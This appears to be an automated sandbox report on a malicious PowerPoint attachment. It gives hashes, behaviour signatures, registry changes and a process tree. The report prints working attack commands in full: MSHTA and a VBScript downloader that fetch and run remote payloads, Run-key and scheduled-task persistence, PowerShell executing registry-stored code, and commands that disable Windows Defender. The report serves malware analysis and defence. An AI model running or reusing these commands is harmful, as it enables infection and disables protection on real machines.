736c4ad042343164463dce61269b4ab6101d8e34a4accbc3f2d23bb2e6a42f4a

Analysis

max time kernel
25s
max time network
28s
platform
windows7_x64
resource
win7v20201028
submitted
08-03-2021 23:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEW ORDER 032021-W878.ppt
Size

71KB
MD5

5c63ab7763e609cf490333be0be26596
SHA1

a3b5eb9fcbc36854ef61ef2c25ccf9fa5c1a5260
SHA256

736c4ad042343164463dce61269b4ab6101d8e34a4accbc3f2d23bb2e6a42f4a
SHA512

e6ed55100eac92bf698af254a6cd4b1ba0b87a1290ff5d2fd37ea6166b4444c2267c89c5d7e8d524a5250b0b33a95004d3168924f4e4b091d1b1add8c5c5a3a9

Score

10^/10

persistence

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Public\bin.vbs	disable_win_def

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

MSHTA.exeping.exeping.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1056	1764	MSHTA.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1540	1764	ping.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1916	1764	ping.exe	POWERPNT.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2452	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2476	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2500	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2628	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2692	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2760	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2916	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2064	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1152	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	2204	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2620	2204	powershell.exe

Blocklisted process makes network request 9 IoCs

Processes:

MSHTA.exeWScript.exe

flow	pid	process
6	1056	MSHTA.exe
8	1056	MSHTA.exe
10	1056	MSHTA.exe
12	1056	MSHTA.exe
13	1056	MSHTA.exe
15	1056	MSHTA.exe
17	1056	MSHTA.exe
18	1056	MSHTA.exe
22	1892	WScript.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

MSHTA.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/14.html\"\", 0 : window.close\")"	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)\|IEX\"\", 0 : window.close\")"	MSHTA.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)\|IEX\"\", 0 : window.close\")"	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/14.html\"\", 0 : window.close\")"	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/14.html\"\", 0 : window.close\")"	MSHTA.exe

Drops file in Windows directory 1 IoCs

Processes:

winword.exe

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log winword.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1968 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1960 taskkill.exe
1752 taskkill.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	winword.exe

pid	process
1968	schtasks.exe

pid	process
1960	taskkill.exe
1752	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

POWERPNT.EXEMSHTA.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	POWERPNT.EXE

Modifies registry class 64 IoCs

Processes:

POWERPNT.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493464-5A91-11CF-8700-00AA0060263B}\ = "Hyperlinks"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493483-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E7-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347B-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493495-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A72-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A67-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A75-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "Series"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346B-5A91-11CF-8700-00AA0060263B}\ = "SlideRange"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493471-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493457-5A91-11CF-8700-00AA0060263B}\ = "DocumentWindow"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934B9-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EA-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7B-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E55A-4FF5-48F4-8215-5505F990966F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346B-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A54-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A68-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A72-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6D-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493492-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C7-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F9-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5E-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493491-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C4-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5A-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346E-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347E-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493481-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493487-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A62-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A78-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "TickLabels"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348A-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CC-5A91-11CF-8700-00AA0060263B}\ = "Pane"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D0-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F7-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C0-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A51-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "FileConverter"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5D-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493442-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345D-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493481-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934B9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E557-4FF5-48F4-8215-5505F990966F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493472-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493497-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E0-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A73-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DD-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E3-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A56-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5F-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493456-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345F-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493464-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493477-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E552-4FF5-48F4-8215-5505F990966F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493470-5A91-11CF-8700-00AA0060263B}\ = "RGBColor"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493493-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493496-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EA-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

ping.exeping.exe

pid process

1916 ping.exe
1540 ping.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

POWERPNT.EXEwinword.exe

pid process

1764 POWERPNT.EXE
1672 winword.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

taskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 1960 taskkill.exe
Token: SeDebugPrivilege 1752 taskkill.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

winword.exe

pid process

1672 winword.exe
1672 winword.exe

pid	process
1916	ping.exe
1540	ping.exe

pid	process
1764	POWERPNT.EXE
1672	winword.exe

description	pid	process
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe

pid	process
1672	winword.exe
1672	winword.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

POWERPNT.EXEMSHTA.execmd.exe

description	pid	process	target process
PID 1764 wrote to memory of 1172	1764	POWERPNT.EXE	splwow64.exe
PID 1764 wrote to memory of 1172	1764	POWERPNT.EXE	splwow64.exe
PID 1764 wrote to memory of 1172	1764	POWERPNT.EXE	splwow64.exe
PID 1764 wrote to memory of 1172	1764	POWERPNT.EXE	splwow64.exe
PID 1764 wrote to memory of 1672	1764	POWERPNT.EXE	winword.exe
PID 1764 wrote to memory of 1672	1764	POWERPNT.EXE	winword.exe
PID 1764 wrote to memory of 1672	1764	POWERPNT.EXE	winword.exe
PID 1764 wrote to memory of 1672	1764	POWERPNT.EXE	winword.exe
PID 1764 wrote to memory of 1056	1764	POWERPNT.EXE	MSHTA.exe
PID 1764 wrote to memory of 1056	1764	POWERPNT.EXE	MSHTA.exe
PID 1764 wrote to memory of 1056	1764	POWERPNT.EXE	MSHTA.exe
PID 1764 wrote to memory of 1056	1764	POWERPNT.EXE	MSHTA.exe
PID 1764 wrote to memory of 1540	1764	POWERPNT.EXE	ping.exe
PID 1764 wrote to memory of 1540	1764	POWERPNT.EXE	ping.exe
PID 1764 wrote to memory of 1540	1764	POWERPNT.EXE	ping.exe
PID 1764 wrote to memory of 1540	1764	POWERPNT.EXE	ping.exe
PID 1764 wrote to memory of 1916	1764	POWERPNT.EXE	ping.exe
PID 1764 wrote to memory of 1916	1764	POWERPNT.EXE	ping.exe
PID 1764 wrote to memory of 1916	1764	POWERPNT.EXE	ping.exe
PID 1764 wrote to memory of 1916	1764	POWERPNT.EXE	ping.exe
PID 1056 wrote to memory of 1596	1056	MSHTA.exe	cmd.exe
PID 1056 wrote to memory of 1596	1056	MSHTA.exe	cmd.exe
PID 1056 wrote to memory of 1596	1056	MSHTA.exe	cmd.exe
PID 1056 wrote to memory of 1596	1056	MSHTA.exe	cmd.exe
PID 1056 wrote to memory of 1968	1056	MSHTA.exe	schtasks.exe
PID 1056 wrote to memory of 1968	1056	MSHTA.exe	schtasks.exe
PID 1056 wrote to memory of 1968	1056	MSHTA.exe	schtasks.exe
PID 1056 wrote to memory of 1968	1056	MSHTA.exe	schtasks.exe
PID 1596 wrote to memory of 1892	1596	cmd.exe	WScript.exe
PID 1596 wrote to memory of 1892	1596	cmd.exe	WScript.exe
PID 1596 wrote to memory of 1892	1596	cmd.exe	WScript.exe
PID 1596 wrote to memory of 1892	1596	cmd.exe	WScript.exe
PID 1056 wrote to memory of 1692	1056	MSHTA.exe	powershell.exe
PID 1056 wrote to memory of 1692	1056	MSHTA.exe	powershell.exe
PID 1056 wrote to memory of 1692	1056	MSHTA.exe	powershell.exe
PID 1056 wrote to memory of 1692	1056	MSHTA.exe	powershell.exe
PID 1056 wrote to memory of 1324	1056	MSHTA.exe	powershell.exe
PID 1056 wrote to memory of 1324	1056	MSHTA.exe	powershell.exe
PID 1056 wrote to memory of 1324	1056	MSHTA.exe	powershell.exe
PID 1056 wrote to memory of 1324	1056	MSHTA.exe	powershell.exe
PID 1056 wrote to memory of 1960	1056	MSHTA.exe	taskkill.exe
PID 1056 wrote to memory of 1960	1056	MSHTA.exe	taskkill.exe
PID 1056 wrote to memory of 1960	1056	MSHTA.exe	taskkill.exe
PID 1056 wrote to memory of 1960	1056	MSHTA.exe	taskkill.exe
PID 1056 wrote to memory of 1752	1056	MSHTA.exe	taskkill.exe
PID 1056 wrote to memory of 1752	1056	MSHTA.exe	taskkill.exe
PID 1056 wrote to memory of 1752	1056	MSHTA.exe	taskkill.exe
PID 1056 wrote to memory of 1752	1056	MSHTA.exe	taskkill.exe

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\NEW ORDER 032021-W878.ppt"
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1172

C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
winword
2⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1672

C:\Windows\SysWOW64\MSHTA.exe
MSHTA http://12384928198391823%[email protected]/dokdwkkwkdwkmmmnkdodosaskkdkwk
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
3⤵
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
4⤵
- Blocklisted process makes network request
PID:1892

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\bin.vbs"
5⤵
PID:2340

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\SysWOW64\WScript.exe" "C:\Users\Public\bin.vbs" /elevate
6⤵
PID:2396

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/14.html""\"", 0 : window.close"\")
3⤵
- Creates scheduled task(s)
PID:1968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
3⤵
PID:1692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
3⤵
PID:1324

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\SysWOW64\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:1540

C:\Windows\SysWOW64\ping.exe
ping 127.0.0.1
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:1916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
1⤵
- Process spawned unexpected child process
PID:2452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true
1⤵
- Process spawned unexpected child process
PID:2476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
1⤵
- Process spawned unexpected child process
PID:2500

